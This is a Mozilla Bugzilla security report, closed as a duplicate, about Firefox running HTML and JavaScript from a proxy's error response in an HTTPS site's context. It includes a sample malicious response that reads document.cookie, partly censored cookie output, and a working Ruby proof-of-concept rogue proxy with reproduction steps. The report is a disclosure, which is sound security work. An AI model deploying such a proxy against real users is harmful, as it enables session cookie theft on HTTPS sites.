Closed Bug 488386 Opened 16 years ago Closed 16 years ago

SSL MiTM on Firefox while using a Proxy by doing Hi-Jacking the Proxy

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Type:
defect
Priority:
Not set
Severity:
major

Tracking

()

Status:
RESOLVED DUPLICATE of bug 479880

People

(Reporter: Hugo, Unassigned)

Details

(Whiteboard: [sg:dupe 479880])

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8 Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8 When the browser perform a CONNECT request on a proxy to establish a SSL connection, and the proxy return a error message containing HTML (And Javascript), the HTML Code will be displayed and executed in the HTTPS Website Context. An attacker can take advantage of this by becoming their victim's proxy (i.e. by performing a MiTM between them and their proxy) or by forcing the user to use them as proxy if they have Proxy Auto Config enabled. Here are examples of the connection: CONNECT bugzilla.mozilla.org:443 HTTP/1.1 HTTP/1.1 500 Internal Server Error Connection: close Content-Type: text/html Content-Length: 257 <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.0//EN'> <HTML> <HEAD><TITLE>W00t</TITLE></HEAD> <SCRIPT> document.write('URL:'+document.location) document.write('<BR>Cookie<BR>'+document.cookie) </SCRIPT> <BODY> p0wned this is Hugo Website! </BODY> </HTML> Here would be the displayed text: URL:https://bugzilla.mozilla.org/ Cookie dloadday=74.198.12.7.1226018811245284; __utma=150903082.903216627.1231182983.1231182983.1231182983.1; __utmz=150903082.1231182983.1.1.utmccn=(organic)|utmcsr=google|utmctr=mozilla+security|utmcmd=organic; Bugzilla_login=censured; Bugzilla_logincookie=censured p0wned this is Hugo Website! Here is the PoC Code: #!/usr/bin/ruby require 'socket' doc="<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.0//EN'> <HTML> <HEAD><TITLE>W00t</TITLE></HEAD> <SCRIPT> document.write('URL:'+document.location) document.write('<BR>Cookie<BR>'+document.cookie) </SCRIPT> <BODY> p0wned this is Hugo Website! </BODY> </HTML>" test=" HTTP/1.1 500 Internal Server Error Connection: close Content-Type: text/html Content-Length: #{doc.length} #{doc}" server = TCPServer.new('0.0.0.0', 8888) while (session = server.accept) puts "Request: #{session.gets}" session.print test puts test session.close end Reproducible: Always Steps to Reproduce: 1. Execute the PoC Malicious proxy code 2. Configure Firefox bowser to use that proxy on port (8888) 3. Go to a SSL website Actual Results: SSL MiTM Expected Results: Not display HTML Code, but a predefined Error Message instead.
I am pretty sure this is a dupe of bug 479880.
Yes, this is the same issue.
Status: UNCONFIRMED → RESOLVED
Closed: 16 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 479880]
Group: core-security
You need to log in before you can comment on or make changes to this bug.